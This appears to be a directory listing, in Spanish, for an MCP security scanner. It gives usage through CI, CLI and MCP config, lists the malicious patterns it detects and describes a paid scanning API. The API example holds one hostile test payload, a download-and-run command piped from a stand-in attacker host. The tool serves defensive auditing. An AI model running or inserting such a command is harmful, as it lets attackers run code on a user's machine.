Skip to main content
Glama
deenesjakoruzh
eltociear

mcp-security-audit

by eltociear
OverviewSchemaRelated ServersScoreDiscussions
Python
Local

mcp-security-audit

Analiza servidores MCP, habilidades de agentes de IA y complementos en busca de más de 68 patrones maliciosos, incluyendo exfiltración de credenciales, inyección de prompts, ejecución de código, recolección de frases semilla y más.

Tres formas de usarlo:

1. GitHub Action (CI/CD)

Añádelo a tu flujo de trabajo para analizar automáticamente las PR:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'

Con carga de SARIF (muestra los hallazgos en la pestaña de Seguridad de GitHub):

      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx mcp-security-audit --path ./server.py

# Scan a directory
npx mcp-security-audit --path ./mcp-servers/

# JSON output
npx mcp-security-audit --path . --json

# SARIF output
npx mcp-security-audit --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH

O instálalo globalmente:

npm install -g mcp-security-audit
mcp-audit --path ./server.py

3. Servidor MCP (Claude Desktop / Cursor)

Añádelo a tu configuración de MCP:

{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Luego pregúntale a Claude: "Audit this MCP server for security issues"

Qué detecta

Severidad

Patrones

CRÍTICA

Descargar y ejecutar, exfiltración de credenciales, generación de claves, escritura en directorios sensibles, recolección de frases semilla

ALTA

Descargas externas, instalación de habilidades, ejecución arbitraria de código, omisión de autenticación, suplantación de identidad

MEDIA

Llamadas a API desconocidas, recopilación de datos, escalada de privilegios, ofuscación, inyección de prompts

BAJA

Referencias a URL externas, acceso amplio al sistema de archivos

Puntuación de riesgo

  • 0-10: SEGURO

  • 11-25: BAJO

  • 26-50: MEDIO

  • 51-75: ALTO

  • 76-100: CRÍTICO

API

El escáner también está disponible como una API de pago:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

Licencia

MIT

This server cannot be installed

A
license - permissive license
-
quality - not tested
B
maintenance

How are these scores calculated?

Maintenance

Maintainers
Response time
Release cycle
1Releases (12mo)

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/mcp-security-audit'

If you have feedback or need assistance with the MCP directory API, please join our Discord server